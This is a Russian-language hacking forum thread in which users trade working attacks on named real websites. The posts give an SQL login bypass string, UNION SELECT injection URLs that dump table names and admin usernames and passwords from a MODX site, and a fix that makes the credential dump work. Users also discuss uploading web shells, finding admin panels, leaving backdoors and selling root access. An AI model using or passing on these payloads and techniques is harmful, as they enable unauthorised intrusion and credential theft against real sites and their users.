К MSysObjects доступа нет, так что только перебором Кста там обход авторизации возможен http://www.bestperiodica.com/MyAccount.asp В E-mail ' or '1'='1# в пароль что угодно
sql inj короче, есть бажный сайт: http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+1,2/* в нем столько табличек: http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+all+select+1,table_name+from+information_schema.tables+limit+86,1/* самые интересные это: modx_active_users -тридцатая modx_manager_users -37 modx_web_users -66 из них получаем столбцы: username password но когда я хочу просмотреть эти столбцы вводя например вот это: http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+username,password+from+modx_manager_users+limit+1,1/* то никакого имени и пароля не получается! может я не так что-то делаю, помогите кто может.
т к в таблице modx_manager_users всего одна запись, то поэтому limit+1,1 ничего не выводит. c limit+0,1 всё нормально: Code: http://prazdnik.com.ua/index.php?id=54&pid=-3509'+union+select+username,password+from+modx_manager_users+limit+0,1/*
Залил шелл... Но имею доступ только к той папке, где находится шелл! /imgs/ drwxr-xr-x и всё... В чём дело?
https://forum.antichat.ru/showthread.php?t=30711 http://forum.antichat.ru/showpost.php?p=137357&postcount=1 мб пригодится
кто поможет найти админку http://cards.intbel.ru/??? есть у кого нить таблица для поиска админки? ну типа: adm/ admin/ admin.php итд желательно побольше
Insane bboy 1. Админки может не быть 2. Админка может быть на порту. 3. Админка может быть на субдомене. 4. Юзай pelmeshko skaner, он ищет диры и файлы. Удачи.
Дальше? Ну допустим оставляешь бэкдор. Дальше? если ты не знаешь для чего тебе может понадобится рут, то проще будет его продать.
http://space.jpl.nasa.gov/analog.txt Что за нах? о_0 Там в конце документа вообще какие-то GET-запросы о_0... Мол там каждый 2ой пытается шелл залить =\ //Моно использовать вместо илворма, т.к. там все баги в Джумле о_0
